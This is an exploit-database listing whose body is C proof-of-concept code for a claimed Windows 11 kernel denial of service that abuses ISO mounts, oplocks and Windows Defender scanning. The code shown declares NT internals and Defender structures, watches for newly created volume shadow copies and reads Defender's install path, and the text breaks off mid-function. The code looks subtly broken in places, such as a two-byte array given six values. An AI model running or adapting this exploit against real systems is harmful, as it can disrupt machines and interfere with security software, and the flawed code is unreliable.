PACKETSTORM

📄 Microsoft Windows Kernel ISO Mount / Oplock Deserialization Denial of Service_PACKETSTORM:223817

June 19, 2026 invoker category_exploit

Description

Proof of concept exploit for a logic-based denial of service vulnerability in Windows 11 25H2 Build 26200 that causes permanent kernel state corruption through ISO mounting, oplocks, and Windows Defender scanning...
Visit Original Source

Basic Information

ID PACKETSTORM:223817
Published Jun 18, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Windows Kernel Logical Denial of Service via ISO Mount + Oplock Deserialization |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : Windows 11 25H2 (Build 26200) and later |
==================================================================================================================================

[+] Summary : A Logical Denial of Service (LDoS) vulnerability in Windows 11 25H2 (Build 26200) that causes permanent kernel state corruption through ISO mounting, oplocks, and Windows Defender scanning.

[+] Payload :


#define _CRT_SECURE_NO_WARNINGS
#define _WIN32_DCOM
#include <iostream>
#include <Windows.h>
#include <Psapi.h>
#include <winternl.h>
#include <conio.h>
#include <ntstatus.h>
#include <virtdisk.h>
#include <shlwapi.h>
#include <initguid.h>
#include <ole2.h>
#include <comdef.h>
#include <taskschd.h>
#include <bcrypt.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#pragma comment(lib, "kernel32.lib")
#pragma comment(lib, "bcrypt.lib")
#pragma comment(lib, "taskschd.lib")
#pragma comment(lib, "comsupp.lib")
#pragma comment(lib, "virtdisk.lib")
#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "Rpcrt4.lib")
#pragma comment(lib, "shlwapi.lib")

wchar_t zippath[MAX_PATH] = { 0 };
HMODULE ntdllhm = NULL;
HANDLE g_poseidonevent = NULL;
bool g_poseidonexit = false;
char g_poseidonbuf[0x1000] = { 0 };

unsigned char rawData[2] = {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

NTSTATUS(WINAPI* _NtSetInformationFile)(
HANDLE FileHandle,
PIO_STATUS_BLOCK IoStatusBlock,
PVOID FileInformation,
ULONG Length,
FILE_INFORMATION_CLASS FileInformationClass
) = NULL;

NTSTATUS(WINAPI* _NtDeleteFile)(
_In_ POBJECT_ATTRIBUTES ObjectAttributes
) = NULL;

NTSTATUS(WINAPI* _NtOpenDirectoryObject)(
PHANDLE DirectoryHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes
) = NULL;

NTSTATUS(WINAPI* _NtQueryDirectoryObject)(
HANDLE DirectoryHandle,
PVOID Buffer,
ULONG Length,
BOOLEAN ReturnSingleEntry,
BOOLEAN RestartScan,
PULONG Context,
PULONG ReturnLength
) = NULL;

NTSTATUS(WINAPI* _NtQueryInformationFile)(
HANDLE FileHandle,
PIO_STATUS_BLOCK IoStatusBlock,
PVOID FileInformation,
ULONG Length,
FILE_INFORMATION_CLASS FileInformationClass
) = NULL;

#define RtlOffsetToPointer(Base, Offset) ((PUCHAR)(((PUCHAR)(Base)) + ((ULONG_PTR)(Offset))))
namespace custom_defs {
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemPathInformation,
SystemProcessInformation,
SystemCallCountInformation,
SystemDeviceInformation,
SystemProcessorPerformanceInformation,
SystemFlagsInformation,
SystemCallTimeInformation,
SystemModuleInformation,
SystemLocksInformation,
SystemStackTraceInformation,
SystemPagedPoolInformation,
SystemNonPagedPoolInformation,
SystemHandleInformation,
SystemObjectInformation,
SystemPageFileInformation,
SystemVdmInstemulInformation,
SystemVdmBopInformation,
SystemFileCacheInformation,
SystemPoolTagInformation,
SystemInterruptInformation,
SystemDpcBehaviorInformation,
SystemFullMemoryInformation,
SystemLoadGdiDriverInformation,
SystemUnloadGdiDriverInformation,
SystemTimeAdjustmentInformation,
SystemSummaryMemoryInformation,
SystemMirrorMemoryInformation,
SystemPerformanceTraceInformation,
SystemObsolete0,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemExtendServiceTableInformation,
SystemPrioritySeparation,
SystemVerifierAddDriverInformation,
SystemVerifierRemoveDriverInformation,
SystemProcessorIdleInformation,
SystemLegacyDriverInformation,
SystemCurrentTimeZoneInformation,
SystemLookasideInformation,
SystemTimeSlipNotification,
SystemSessionCreate,
SystemSessionDetach,
SystemSessionInformation,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemVerifierThunkExtend,
SystemSessionProcessInformation,
SystemLoadGdiDriverInSystemSpace,
SystemNumaProcessorMap,
SystemPrefetcherInformation,
SystemExtendedProcessInformation,
SystemRecommendedSharedDataAlignment,
SystemComPlusPackage,
SystemNumaAvailableMemory,
SystemProcessorPowerInformation,
SystemEmulationBasicInformation,
SystemEmulationProcessorInformation,
SystemExtendedHandleInformation,
SystemLostDelayedWriteInformation,
SystemBigPoolInformation,
SystemSessionPoolTagInformation,
SystemSessionMappedViewInformation,
SystemHotpatchInformation,
SystemObjectSecurityMode,
SystemWatchdogTimerHandler,
SystemWatchdogTimerInformation,
SystemLogicalProcessorInformation,
SystemWow64SharedInformationObsolete,
SystemRegisterFirmwareTableInformationHandler,
SystemFirmwareTableInformation,
SystemModuleInformationEx,
SystemVerifierTriageInformation,
SystemSuperfetchInformation,
SystemMemoryListInformation,
SystemFileCacheInformationEx,
SystemThreadPriorityClientIdInformation,
SystemProcessorIdleCycleTimeInformation,
SystemVerifierCancellationInformation,
SystemProcessorPowerInformationEx,
SystemRefTraceInformation,
SystemSpecialPoolInformation,
SystemProcessIdInformation,
SystemErrorPortInformation,
SystemBootEnvironmentInformation,
SystemHypervisorInformation,
SystemVerifierInformationEx,
SystemTimeZoneInformation,
SystemImageFileExecutionOptionsInformation,
SystemCoverageInformation,
SystemPrefetchPatchInformation,
SystemVerifierFaultsInformation,
SystemSystemPartitionInformation,
SystemSystemDiskInformation,
SystemProcessorPerformanceDistribution,
SystemNumaProximityNodeInformation,
SystemDynamicTimeZoneInformation,
SystemCodeIntegrityInformation,
SystemProcessorMicrocodeUpdateInformation,
SystemProcessorBrandString,
SystemVirtualAddressInformation,
SystemLogicalProcessorAndGroupInformation,
SystemProcessorCycleTimeInformation,
SystemStoreInformation,
SystemRegistryAppendString,
SystemAitSamplingValue,
SystemVhdBootInformation,
SystemCpuQuotaInformation,
SystemNativeBasicInformation,
SystemErrorPortTimeouts,
SystemLowPriorityIoInformation,
SystemTpmBootEntropyInformation,
SystemVerifierCountersInformation,
SystemPagedPoolInformationEx,
SystemSystemPtesInformationEx,
SystemNodeDistanceInformation,
SystemAcpiAuditInformation,
SystemBasicPerformanceInformation,
SystemQueryPerformanceCounterInformation,
SystemSessionBigPoolInformation,
SystemBootGraphicsInformation,
SystemScrubPhysicalMemoryInformation,
SystemBadPageInformation,
SystemProcessorProfileControlArea,
SystemCombinePhysicalMemoryInformation,
SystemEntropyInterruptTimingInformation,
SystemConsoleInformation,
SystemPlatformBinaryInformation,
SystemPolicyInformation,
SystemHypervisorProcessorCountInformation,
SystemDeviceDataInformation,
SystemDeviceDataEnumerationInformation,
SystemMemoryTopologyInformation,
SystemMemoryChannelInformation,
SystemBootLogoInformation,
SystemProcessorPerformanceInformationEx,
SystemCriticalProcessErrorLogInformation,
SystemSecureBootPolicyInformation,
SystemPageFileInformationEx,
SystemSecureBootInformation,
SystemEntropyInterruptTimingRawInformation,
SystemPortableWorkspaceEfiLauncherInformation,
SystemFullProcessInformation,
SystemKernelDebuggerInformationEx,
SystemBootMetadataInformation,
SystemSoftRebootInformation,
SystemElamCertificateInformation,
SystemOfflineDumpConfigInformation,
SystemProcessorFeaturesInformation,
SystemRegistryReconciliationInformation,
SystemEdidInformation,
SystemManufacturingInformation,
SystemEnergyEstimationConfigInformation,
SystemHypervisorDetailInformation,
SystemProcessorCycleStatsInformation,
SystemVmGenerationCountInformation,
SystemTrustedPlatformModuleInformation,
SystemKernelDebuggerFlags,
SystemCodeIntegrityPolicyInformation,
SystemIsolatedUserModeInformation,
SystemHardwareSecurityTestInterfaceResultsInformation,
SystemSingleModuleInformation,
SystemAllowedCpuSetsInformation,
SystemVsmProtectionInformation,
SystemInterruptCpuSetsInformation,
SystemSecureBootPolicyFullInformation,
SystemCodeIntegrityPolicyFullInformation,
SystemAffinitizedInterruptProcessorInformation,
SystemRootSiloInformation,
SystemCpuSetInformation,
SystemCpuSetTagInformation,
SystemWin32WerStartCallout,
SystemSecureKernelProfileInformation,
SystemCodeIntegrityPlatformManifestInformation,
SystemInterruptSteeringInformation,
SystemSupportedProcessorArchitectures,
SystemMemoryUsageInformation,
SystemCodeIntegrityCertificateInformation,
SystemPhysicalMemoryInformation,
SystemControlFlowTransition,
SystemKernelDebuggingAllowed,
SystemActivityModerationExeState,
SystemActivityModerationUserSettings,
SystemCodeIntegrityPoliciesFullInformation,
SystemCodeIntegrityUnlockInformation,
SystemIntegrityQuotaInformation,
SystemFlushInformation,
SystemProcessorIdleMaskInformation,
SystemSecureDumpEncryptionInformation,
SystemWriteConstraintInformation,
SystemKernelVaShadowInformation,
SystemHypervisorSharedPageInformation,
SystemFirmwareBootPerformanceInformation,
SystemCodeIntegrityVerificationInformation,
SystemFirmwarePartitionInformation,
SystemSpeculationControlInformation,
SystemDmaGuardPolicyInformation,
SystemEnclaveLaunchControlInformation,
SystemWorkloadAllowedCpuSetsInformation,
SystemCodeIntegrityUnlockModeInformation,
SystemLeapSecondInformation,
SystemFlags2Information,
SystemSecurityModelInformation,
SystemCodeIntegritySyntheticCacheInformation,
SystemFeatureConfigurationInformation,
SystemFeatureConfigurationSectionInformation,
SystemFeatureUsageSubscriptionInformation,
SystemSecureSpeculationControlInformation,
SystemSpacesBootInformation,
SystemFwRamdiskInformation,
SystemWheaIpmiHardwareInformation,
SystemDifSetRuleClassInformation,
SystemDifClearRuleClassInformation,
SystemDifApplyPluginVerificationOnDriver,
SystemDifRemovePluginVerificationOnDriver,
SystemShadowStackInformation,
SystemBuildVersionInformation,
SystemPoolLimitInformation,
SystemCodeIntegrityAddDynamicStore,
SystemCodeIntegrityClearDynamicStores,
SystemDifPoolTrackingInformation,
SystemPoolZeroingInformation,
SystemDpcWatchdogInformation,
SystemDpcWatchdogInformation2,
SystemSupportedProcessorArchitectures2,
SystemSingleProcessorRelationshipInformation,
SystemXfgCheckFailureInformation,
SystemIommuStateInformation,
SystemHypervisorMinrootInformation,
SystemHypervisorBootPagesInformation,
SystemPointerAuthInformation,
SystemSecureKernelDebuggerInformation,
SystemOriginalImageFeatureInformation,
SystemMemoryNumaInformation,
SystemMemoryNumaPerformanceInformation,
SystemCodeIntegritySignedPoliciesFullInformation,
SystemSecureCoreInformation,
SystemTrustedAppsRuntimeInformation,
SystemBadPageInformationEx,
SystemResourceDeadlockTimeout,
SystemBreakOnContextUnwindFailureInformation,
SystemOslRamdiskInformation,
SystemCodeIntegrityPolicyManagementInformation,
SystemMemoryNumaCacheInformation,
SystemProcessorFeaturesBitMapInformation,
SystemRefTraceInformationEx,
SystemBasicProcessInformation,
SystemHandleCountInformation,
SystemRuntimeAttestationReport,
SystemPoolTagInformation2,
SystemCodeIntegrityEndpointSecurityInformation,
MaxSystemInfoClass
} SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
PVOID Object;
HANDLE UniqueProcessId;
HANDLE HandleValue;
ACCESS_MASK GrantedAccess;
USHORT CreatorBackTraceIndex;
USHORT ObjectTypeIndex;
ULONG HandleAttributes;
ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
ULONG_PTR NumberOfHandles;
ULONG_PTR Reserved;
_Field_size_(NumberOfHandles) SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
typedef enum _FILE_INFORMATION_CLASS {
FileDirectoryInformation = 1,
FileFullDirectoryInformation,
FileBothDirectoryInformation,
FileBasicInformation,
FileStandardInformation,
FileInternalInformation,
FileEaInformation,
FileAccessInformation,
FileNameInformation,
FileRenameInformation,
FileLinkInformation,
FileNamesInformation,
FileDispositionInformation,
FilePositionInformation,
FileFullEaInformation,
FileModeInformation,
FileAlignmentInformation,
FileAllInformation,
FileAllocationInformation,
FileEndOfFileInformation,
FileAlternateNameInformation,
FileStreamInformation,
FilePipeInformation,
FilePipeLocalInformation,
FilePipeRemoteInformation,
FileMailslotQueryInformation,
FileMailslotSetInformation,
FileCompressionInformation,
FileObjectIdInformation,
FileCompletionInformation,
FileMoveClusterInformation,
FileQuotaInformation,
FileReparsePointInformation,
FileNetworkOpenInformation,
FileAttributeTagInformation,
FileTrackingInformation,
FileIdBothDirectoryInformation,
FileIdFullDirectoryInformation,
FileValidDataLengthInformation,
FileShortNameInformation,
FileIoCompletionNotificationInformation,
FileIoStatusBlockRangeInformation,
FileIoPriorityHintInformation,
FileSfioReserveInformation,
FileSfioVolumeInformation,
FileHardLinkInformation,
FileProcessIdsUsingFileInformation,
FileNormalizedNameInformation,
FileNetworkPhysicalNameInformation,
FileIdGlobalTxDirectoryInformation,
FileIsRemoteDeviceInformation,
FileUnusedInformation,
FileNumaNodeInformation,
FileStandardLinkInformation,
FileRemoteProtocolInformation,
FileRenameInformationBypassAccessCheck,
FileLinkInformationBypassAccessCheck,
FileVolumeNameInformation,
FileIdInformation,
FileIdExtdDirectoryInformation,
FileReplaceCompletionInformation,
FileHardLinkFullIdInformation,
FileIdExtdBothDirectoryInformation,
FileDispositionInformationEx,
FileRenameInformationEx,
FileRenameInformationExBypassAccessCheck,
FileDesiredStorageClassInformation,
FileStatInformation,
FileMemoryPartitionInformation,
FileStatLxInformation,
FileCaseSensitiveInformation,
FileLinkInformationEx,
FileLinkInformationExBypassAccessCheck,
FileStorageReserveIdInformation,
FileCaseSensitiveInformationForceAccessCheck,
FileKnownFolderInformation,
FileStatBasicInformation,
FileId64ExtdDirectoryInformation,
FileId64ExtdBothDirectoryInformation,
FileIdAllExtdDirectoryInformation,
FileIdAllExtdBothDirectoryInformation,
FileStreamReservationInformation,
FileMupProviderInfo,
FileMaximumInformation
} FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS;
}
typedef HANDLE MPHANDLE;
typedef HANDLE* PMPHANDLE;
typedef ULONG MPTHREAT_ID;
typedef ULONG MPRESOURCE_CLASS;
typedef LPWSTR MP_MIDL_STRING;

typedef enum tagMPTHREAT_TYPE {
MPTHREAT_TYPE_KNOWNBAD = 0,
MPTHREAT_TYPE_BEHAVIOR = 1,
MPTHREAT_TYPE_UNKNOWN = 2,
MPTHREAT_TYPE_KNOWNGOOD = 3,
MPTHREAT_TYPE_NIS = 4,
MPTHREAT_TYPE_MAXVALUE = 4
} MPTHREAT_TYPE;

typedef enum tagMPTHREAT_SOURCE {
MPTHREAT_SOURCE_SCAN = 0,
MPTHREAT_SOURCE_ACTIVE = 1,
MPTHREAT_SOURCE_HISTORY = 2,
MPTHREAT_SOURCE_QUARANTINE = 3,
MPTHREAT_SOURCE_SIGNATURE = 4,
MPTHREAT_SOURCE_STATE = 5,
MPTHREAT_SOURCE_MAXVALUE = 5
} MPTHREAT_SOURCE;

typedef enum tagMPSCAN_TYPE {
MPSCAN_TYPE_UNKNOWN = 0,
MPSCAN_TYPE_QUICK = 1,
MPSCAN_TYPE_FULL = 2,
MPSCAN_TYPE_RESOURCE = 3,
MPSCAN_TYPE_MAXVALUE = 3
} MPSCAN_TYPE;

typedef enum tagMPTHREAT_ACTION {
MP_THREAT_ACTION_UNKNOWN = 0,
MP_THREAT_ACTION_CLEAN = 1,
MP_THREAT_ACTION_QUARANTINE = 2,
MP_THREAT_ACTION_REMOVE = 3,
MP_THREAT_ACTION_ALLOW = 6,
MP_THREAT_ACTION_USERDEFINED = 8,
MP_THREAT_ACTION_NOACTION = 9,
MP_THREAT_ACTION_BLOCK = 10,
MP_THREAT_ACTION_MAX_VALUE = 10
} MPTHREAT_ACTION;

typedef struct tagMPTHREAT_INFO {
MPTHREAT_ID ThreatID;
GUID DetectionID;
MP_MIDL_STRING Name;
MPTHREAT_TYPE ThreatType;
MPTHREAT_SEVERITY ThreatCriticality;
MPTHREAT_CATEGORY ThreatCategory;
DWORD ThreatShortDescriptionID;
DWORD ThreatAdviseDescriptionID;
MPTHREAT_STATUS ThreatStatus;
DWORD SuggestedActionCount;
MPTHREAT_ACTION SuggestedActionArray[10000];
DWORD ResourceCount;
PVOID ResourceList[1024];
ULARGE_INTEGER ThreatStatusTime;
HRESULT ThreatStatusCode;
DWORD ThreatDetection;
GUID QuarantineGuid;
DWORD ExecutionStatus;
PVOID Data;
DWORD State;
MP_MIDL_STRING DetectionUser;
DWORD DetectionSource;
MP_MIDL_STRING ProcessName;
DWORD DetectionOrigin;
DWORD reserved1;
ULARGE_INTEGER DetectionTime;
DWORD PreExecutionStatus;
ULARGE_INTEGER RemediationTime;
DWORD PostExecutionStatus;
BOOL CriticalFailure;
DWORD NonCriticalReason;
MP_MIDL_STRING RemediationUser;
DWORD RemediationResourceCount;
PVOID RemediationResourceList[1024];
BOOL FailureResolved;
DWORD ResolvedReason;
DWORD AdditionalActions;
DWORD ResolvedActions;
DWORD dwThreatStatusFlag;
} MPTHREAT_INFO, * PMPTHREAT_INFO;

typedef struct tagMPRESOURCE_INFO {
MP_MIDL_STRING Scheme;
MP_MIDL_STRING Path;
MPRESOURCE_CLASS Class;
} MPRESOURCE_INFO, * PMPRESOURCE_INFO;

typedef struct tagMPSCAN_RESOURCES {
DWORD dwResourceCount;
PMPRESOURCE_INFO pResourceList;
} MPSCAN_RESOURCES, * PMPSCAN_RESOURCES;

typedef struct tagMPCALLBACK_INFO {
void* CallbackHandler;
__int64 v4;
} MPCALLBACK_INFO, * PMPCALLBACK_INFO;
typedef struct _FILE_BASIC_INFORMATION {
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
ULONG FileAttributes;
} FILE_BASIC_INFORMATION, * PFILE_BASIC_INFORMATION;

typedef struct _FILE_RENAME_INFORMATION {
union {
BOOLEAN ReplaceIfExists;
ULONG Flags;
} DUMMYUNIONNAME;
HANDLE RootDirectory;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_RENAME_INFORMATION, * PFILE_RENAME_INFORMATION;

typedef struct _REPARSE_DATA_BUFFER {
ULONG ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
union {
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
ULONG Flags;
WCHAR PathBuffer[1];
} SymbolicLinkReparseBuffer;
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
WCHAR PathBuffer[1];
} MountPointReparseBuffer;
struct {
UCHAR DataBuffer[1];
} GenericReparseBuffer;
} DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;

#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)
#define REPARSE_GUID_DATA_BUFFER_HEADER_SIZE 0x8

typedef struct _FILE_DISPOSITION_INFORMATION_EX {
ULONG Flags;
} FILE_DISPOSITION_INFORMATION_EX, * PFILE_DISPOSITION_INFORMATION_EX;
typedef struct _OBJECT_DIRECTORY_INFORMATION {
UNICODE_STRING Name;
UNICODE_STRING TypeName;
} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;
struct LLShadowVolumeNames {
wchar_t* name;
LLShadowVolumeNames* next;
};
void DestroyVSSNamesList(LLShadowVolumeNames* First) {
while (First) {
free(First->name);
LLShadowVolumeNames* next = First->next;
free(First);
First = next;
}
}
LLShadowVolumeNames* RetrieveCurrentVSSList(HANDLE hobjdir, bool* criticalerr, int* vscnumber, DWORD* errorcode) {
if (!criticalerr || !vscnumber || !errorcode)
return NULL;
*vscnumber = 0;
ULONG scanctx = 0;
ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2);
ULONG retsz = 0;
OBJECT_DIRECTORY_INFORMATION* objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
if (!objdirinfo) {
printf("[!] Failed to allocate buffer for object manager directory query.\n");
*criticalerr = true;
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
return NULL;
}
ZeroMemory(objdirinfo, reqsz);
NTSTATUS stat = STATUS_SUCCESS;

do {
stat = _NtQueryDirectoryObject(hobjdir, objdirinfo, reqsz, FALSE, FALSE, &scanctx, &retsz);
if (stat == STATUS_SUCCESS)
break;
else if (stat != STATUS_MORE_ENTRIES) {
printf("[!] NtQueryDirectoryObject failed with 0x%0.8X\n", stat);
*criticalerr = true;
*errorcode = RtlNtStatusToDosError(stat);
return NULL;
}
free(objdirinfo);
reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100;
objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
if (!objdirinfo) {
printf("[!] Failed to allocate required buffer to query object manager directory.\n");
*criticalerr = true;
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
return NULL;
}
ZeroMemory(objdirinfo, reqsz);
} while (1);
void* emptybuff = malloc(sizeof(OBJECT_DIRECTORY_INFORMATION));
ZeroMemory(emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION));
LLShadowVolumeNames* LLVSScurrent = NULL;
LLShadowVolumeNames* LLVSSfirst = NULL;
for (ULONG i = 0; i < ULONG_MAX; i++) {
if (memcmp(&objdirinfo[i], emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)) == 0) {
free(emptybuff);
break;
}
if (_wcsicmp(L"Device", objdirinfo[i].TypeName.Buffer) == 0) {
wchar_t cmpstr[] = { L"HarddiskVolumeShadowCopy" };
if (objdirinfo[i].Name.Length >= sizeof(cmpstr)) {
if (memcmp(cmpstr, objdirinfo[i].Name.Buffer, sizeof(cmpstr) - sizeof(wchar_t)) == 0) {
(*vscnumber)++;
if (LLVSScurrent) {
LLVSScurrent->next = (LLShadowVolumeNames*)malloc(sizeof(LLShadowVolumeNames));
if (!LLVSScurrent->next) {
printf("[!] Failed to allocate memory.\n");
*criticalerr = true;
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
DestroyVSSNamesList(LLVSSfirst);
free(objdirinfo);
return NULL;
}
ZeroMemory(LLVSScurrent->next, sizeof(LLShadowVolumeNames));
LLVSScurrent = LLVSScurrent->next;
LLVSScurrent->name = (wchar_t*)malloc(objdirinfo[i].Name.Length + sizeof(wchar_t));
if (!LLVSScurrent->name) {
printf("[!] Failed to allocate memory.\n");
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
*criticalerr = true;
DestroyVSSNamesList(LLVSSfirst);
free(objdirinfo);
return NULL;
}
ZeroMemory(LLVSScurrent->name, objdirinfo[i].Name.Length + sizeof(wchar_t));
memmove(LLVSScurrent->name, objdirinfo[i].Name.Buffer, objdirinfo[i].Name.Length);
} else {
LLVSSfirst = (LLShadowVolumeNames*)malloc(sizeof(LLShadowVolumeNames));
if (!LLVSSfirst) {
printf("[!] Failed to allocate memory.\n");
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
*criticalerr = true;
DestroyVSSNamesList(LLVSSfirst);
free(objdirinfo);
return NULL;
}
ZeroMemory(LLVSSfirst, sizeof(LLShadowVolumeNames));
LLVSScurrent = LLVSSfirst;
LLVSScurrent->name = (wchar_t*)malloc(objdirinfo[i].Name.Length + sizeof(wchar_t));
if (!LLVSScurrent->name) {
printf("[!] Failed to allocate memory.\n");
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
*criticalerr = true;
DestroyVSSNamesList(LLVSSfirst);
free(objdirinfo);
return NULL;
}
ZeroMemory(LLVSScurrent->name, objdirinfo[i].Name.Length + sizeof(wchar_t));
memmove(LLVSScurrent->name, objdirinfo[i].Name.Buffer, objdirinfo[i].Name.Length);
}
}
}
}
}

free(objdirinfo);
return LLVSSfirst;
}

DWORD WINAPI ShadowCopyFinderThread(void* fullvsspath) {
wchar_t devicepath[] = L"\\Device";
UNICODE_STRING udevpath = { 0 };
RtlInitUnicodeString(&udevpath, devicepath);
OBJECT_ATTRIBUTES objattr = { 0 };
InitializeObjectAttributes(&objattr, &udevpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
NTSTATUS stat = STATUS_SUCCESS;
HANDLE hobjdir = NULL;
DWORD retval = ERROR_SUCCESS;
wchar_t newvsspath[MAX_PATH] = { 0 };
wcscpy(newvsspath, L"\\Device\\");
bool criterr = false;
int vscnum = 0;
bool restartscan = false;
ULONG scanctx = 0;
ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2);
ULONG retsz = 0;
OBJECT_DIRECTORY_INFORMATION* objdirinfo = NULL;
bool srchfound = false;
wchar_t vsswinpath[MAX_PATH] = { 0 };
UNICODE_STRING _vsswinpath = { 0 };
OBJECT_ATTRIBUTES objattr2 = { 0 };
IO_STATUS_BLOCK iostat = { 0 };
HANDLE hlk = NULL;
LLShadowVolumeNames* vsinitial = NULL;
stat = _NtOpenDirectoryObject(&hobjdir, 0x0001, &objattr);
if (stat) {
printf("[!] Failed to open object manager directory, error: 0x%0.8X\n", stat);
retval = RtlNtStatusToDosError(stat);
return retval;
}
void* emptybuff = malloc(sizeof(OBJECT_DIRECTORY_INFORMATION));
if (!emptybuff) {
printf("[!] Failed to allocate memory.\n");
retval = ERROR_NOT_ENOUGH_MEMORY;
goto cleanup;
}
ZeroMemory(emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION));
vsinitial = RetrieveCurrentVSSList(hobjdir, &criterr, &vscnum, &retval);
if (criterr) {
printf("[!] Unexpected error while listing current volume shadow copy volumes.\n");
goto cleanup;
}
if (!vsinitial) {
printf("[*] No volume shadow copies were found.\n");
} else {
printf("[*] Found %d volume shadow copies.\n", vscnum);
}
stat = STATUS_SUCCESS;
scanagain:
do {
if (objdirinfo)
free(objdirinfo);
objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
if (!objdirinfo) {
printf("[!] Failed to allocate required buffer to query object manager directory.\n");
retval = ERROR_NOT_ENOUGH_MEMORY;
goto cleanup;
}
ZeroMemory(objdirinfo, reqsz);
scanctx = 0;
stat = _NtQueryDirectoryObject(hobjdir, objdirinfo, reqsz, FALSE, restartscan, &scanctx, &retsz);
if (stat == STATUS_SUCCESS)
break;
else if (stat != STATUS_MORE_ENTRIES) {
printf("[!] NtQueryDirectoryObject failed with 0x%0.8X\n", stat);
retval = RtlNtStatusToDosError(stat);
goto cleanup;
}
reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100;
} while (1);
for (ULONG i = 0; i < ULONG_MAX; i++) {
if (memcmp(&objdirinfo[i], emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)) == 0) {
break;
}
if (_wcsicmp(L"Device", objdirinfo[i].TypeName.Buffer) == 0) {
wchar_t cmpstr[] = { L"HarddiskVolumeShadowCopy" };
if (objdirinfo[i].Name.Length >= sizeof(cmpstr)) {
if (memcmp(cmpstr, objdirinfo[i].Name.Buffer, sizeof(cmpstr) - sizeof(wchar_t)) == 0) {
LLShadowVolumeNames* current = vsinitial;
bool found = false;
while (current) {
if (_wcsicmp(current->name, objdirinfo[i].Name.Buffer) == 0) {
found = true;
break;
}
current = current->next;
}
if (found)
continue;
else {
srchfound = true;
wcscat(newvsspath, objdirinfo[i].Name.Buffer);
break;
}
}
}
}
}
if (!srchfound) {
restartscan = true;
goto scanagain;
}
if (objdirinfo) {
free(objdirinfo);
objdirinfo = NULL;
}
NtClose(hobjdir);
hobjdir = NULL;
printf("[+] New volume shadow copy detected: %ws\n", newvsspath);
wcscpy(vsswinpath, newvsspath);
wcscat(vsswinpath, L"\\Windows");
RtlInitUnicodeString(&_vsswinpath, vsswinpath);
InitializeObjectAttributes(&objattr2, &_vsswinpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
retry:
stat = NtCreateFile(&hlk, FILE_READ_ATTRIBUTES, &objattr2, &iostat, NULL, NULL, NULL, FILE_OPEN, NULL, NULL, NULL);
if (stat == STATUS_NO_SUCH_DEVICE)
goto retry;
if (stat) {
printf("[!] Failed to open volume shadow copy, error: 0x%0.8X\n", stat);
retval = RtlNtStatusToDosError(stat);
goto cleanup;
}
printf("[+] Successfully accessed volume shadow copy.\n");
CloseHandle(hlk);
if (fullvsspath)
wcscpy((wchar_t*)fullvsspath, newvsspath);
cleanup:
if (hobjdir)
NtClose(hobjdir);
if (emptybuff)
free(emptybuff);
if (vsinitial)
DestroyVSSNamesList(vsinitial);

return retval;
}
DWORD MpCleanCallbackFunction() {
printf("[*] MpCleanCallbackFunction called.\n");
return 0;
}
bool GetWDInstallDir(wchar_t* dirname) {
HKEY hkey = NULL;
LSTATUS lstat = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows Defender", NULL, KEY_QUERY_VALUE, &hkey);
if (lstat) {
printf("[!] Failed to open Windows Defender registry key, error: %d\n", lstat);
return false;
}
DWORD keytype = REG_SZ;
DWORD datasz = MAX_PATH * sizeof(wchar_t);
